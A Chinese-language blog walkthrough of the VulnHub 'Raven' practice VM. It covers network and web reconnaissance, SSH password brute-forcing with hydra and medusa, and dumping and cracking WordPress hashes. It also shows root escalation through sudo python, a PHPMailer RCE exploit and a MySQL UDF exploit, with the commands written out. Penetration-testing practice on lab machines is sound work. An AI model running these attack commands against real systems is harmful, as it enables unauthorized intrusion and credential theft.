超越平凡的生活
26 April 2019
Raven (渗透测试入门)
0x00
- 靶机下载
https://download.vulnhub.com/checksum.txt
对应的 md5值
045162f15e6387ff06a41c6d85ca6731 ./raven/Raven.ova
19ef8801cfd537b63ea262f9c1e690ca ./raven/Raven.ova.torrent
00aef24c4524650724124f5827e4f757 ./raven/Raven2.ova
fb4c0ccd0eafdbf40800039017b5cba1 ./raven/Raven2.ova.torrent
这里有两个靶机 只下载第一个靶机作为练手
- 下载地址 https://download.vulnhub.com/raven/Raven.ova
- 运行环境 vmware/vbox
- 大小 1.4G
- 4个flag和2种方法获取root权限
- 适合初中级选手 我是照葫芦画瓢 把自己当小白鼠
0x01
开始干活 vbox运行虚机 源环境是用nat环境 我怕有问题 用的是hostonly模式 改了一下配置 虚机运行起来 用kali linux找到对应的靶机地址
arp-scan -I eth1 -l
Interface: eth1, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.100 08:00:27:60:98:05 Cadmus Computer Systems
192.168.56.101 0a:00:27:00:00:10 (Unknown)
192.168.56.102 08:00:27:6e:67:d1 Cadmus Computer Systems
192.168.56.105 08:00:27:87:f8:21 Cadmus Computer Systems
192.168.56.130 08:00:27:3a:95:fc Cadmus Computer Systems
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.032 seconds (125.98 hosts/sec). 5 responded
排除法 找到靶机ip 192.168.56.105 用nmap扫一遍端口
nmap -sV -A 192.168.56.105
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-29 20:16 HKT
Nmap scan report for raven.local (192.168.56.105)
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 33997/tcp status
|_ 100024 1 55996/udp status
MAC Address: 08:00:27:87:F8:21 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms raven.local (192.168.56.105)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.98 seconds
找到开放端口 22/80/111
有80先看80
0x02
登录web页面 挨个查看页面 查看线索 http://192.168.56.105 上
发现在 [Security] http://192.168.56.105/service.html
查看网页源代码 发现第一个flag
flag1{b9bbcb33e11b80be759c4e844862482d}
0x03
通过web页面开始web页面目录猜解
有几个工具参考
-
dirb http://192.168.56.105
-
nikto -host http://192.168.56.105
通过扫描 发现有几个端倪点
- /.DS_Store
- /vendor/
- /wordpress/
- 分析此文件 .DS_Store 看看是否有信息泄露
('Count: ', 52) css css css css css css fonts fonts fonts fonts fonts fonts fonts fonts fonts img img img img img img img img img img img js js js js js js js js js js js scss scss scss scss scss scss scss scss scss Security - Doc Security - Doc Security - Doc Security - Doc Security - Doc Security - Doc说明有对应如下几个文件夹 可惜没有啥发现
- 查看Index of /vendor 目录 发现PHPMailerAutoload.php/PATH/VERSION 使用了5.2.16版本的PHPMailer 后续可以利用此漏洞进行潜入
- 使用了wordpress框架 可以用wpscan去扫描对应目录 看看有啥发现
0x04
思路1 先用wpscan 看看有啥发现 wpscan –url http://192.168.56.105/wordpress -e
[i] User(s) Identified:
[+] michael
| Detected By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] steven
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
然后用 michael和 steven 尝试暴力破解用ssh 登录是否有方式
- hydra -L users.txt -P passwd.txt ssh://192.168.56.105
- medusa -h 192.168.56.105 -u michael -P passwd.txt -M ssh -t 5
- medusa -h 192.168.56.105 -u steven -P passwd.txt -M ssh -t 5
发现ssh michael@192.168.56.105密码就是michael 登录进去 查看
michael@Raven:~$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
michael@Raven:~$ ls -la
total 28
drwxr-xr-x 2 michael michael 4096 Dec 30 05:04 .
drwxr-xr-x 4 root root 4096 Aug 13 13:51 ..
-rw------- 1 michael michael 210 Dec 30 05:04 .bash_history
-rw-r--r-- 1 michael michael 220 Aug 13 07:52 .bash_logout
-rw-r--r-- 1 michael michael 3515 Aug 13 07:52 .bashrc
-rw------- 1 root michael 802 Dec 30 04:52 .mysql_history
-rw-r--r-- 1 michael michael 675 Aug 13 07:52 .profile
michael@Raven:~$ ls -la /var/www/
total 20
drwxrwxrwx 3 root root 4096 Aug 13 09:59 .
drwxr-xr-x 12 root root 4096 Aug 13 07:44 ..
-rw------- 1 www-data www-data 519 Dec 30 03:21 .bash_history
-rw-r--r-- 1 root root 40 Aug 13 09:27 flag2.txt
drwxrwxrwx 10 root root 4096 Dec 30 01:28 html
michael@Raven:~$ cat /var/www/flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
在当前用户和 /var/www/html下发现 /** MySQL database password */ define(‘DB_PASSWORD’, ‘R@v3nSecurity’);
/** MySQL hostname */ define(‘DB_HOST’, ‘localhost’);
并且是root进程运行mysql
mysql -u root -pR@v3nSecurity
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables
-> ;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users
-> ;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
mysql> select * from wp_posts;
得到flag3和flag4
flag3{afc01ab56b50591e7dccf93122770cd2} select * from wp_users
flag4{715dea6c055b9fe3337544932f2941ce} select * from wp_users /root/flag4.txt
0x05
暴力分解wp 密码 md5sum john –wordlist=passwd.txt wp_hashes.txt john –show wp_hashes.txt 得到 steven:pink84 ssh steven@192.168.56.105
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
$ sudo /usr/bin/python -c "import os;os.system('/bin/sh')"
# cd /root/
# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
0x07
思路2 利用php漏洞获取shell权限
searchsploit PHPMailer --exclude='(PoC)|/dos/'
------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------ ----------------------------------------
PHPMailer < 5.2.18 - Remote Code Execution (Bash) | exploits/php/webapps/40968.php
PHPMailer < 5.2.18 - Remote Code Execution (PHP) | exploits/php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | exploits/multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | exploits/php/webapps/40969.pl
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-ma | exploits/php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | exploits/php/webapps/43056.py
WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) | exploits/php/remote/42024.rb
------------------------------------------------------------------------ ----------------------------------------
利用exploits/php/webapps/40974.py 修改获取登录权限 按照说明操作 获取登录 利用michael中的 mysql提权root权限
searchsploit MySQL UDF --exclude='(PoC)|/dos/'
------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------ ----------------------------------------
MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1) | exploits/linux/local/1181.c
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) | exploits/linux/local/1518.c
MySQL 4/5/6 - UDF for Command Execution | exploits/linux/local/7856.txt
------------------------------------------------------------------------ ----------------------------------------
cp /home/yg/Sec/exploitdb/exploits/linux/local/1518.c ./raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.c -lc
按照explot操作1518.c说明改动命令权限 获取root权限 touch 1 && find 1 –exec “/bin/sh”\;
0x09
后续考虑如何利用111 rpc进行登录渗透